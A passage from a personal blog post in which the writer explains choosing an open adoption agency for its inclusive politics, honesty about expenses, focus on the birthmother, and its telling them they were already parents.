The list of things I have to do is really terrifying &#8211; I can&#8217;t even go into it here, now.  <\/p>\n<p>It&#8217;s a good agency.  I like their politics &#8211; they&#8217;re friends with Planned Parenthood, and the nature of open adoption means they don&#8217;t discriminate against gay couples.  Or singles, for that matter.  They were honest and up-front about the expenses involved.  They focus on the birthmother and what she needs.  <\/p>\n<p>But you know what decided it?  They told us we were parents, already.  Just parents who are waiting to meet their child.  And that was all it took.
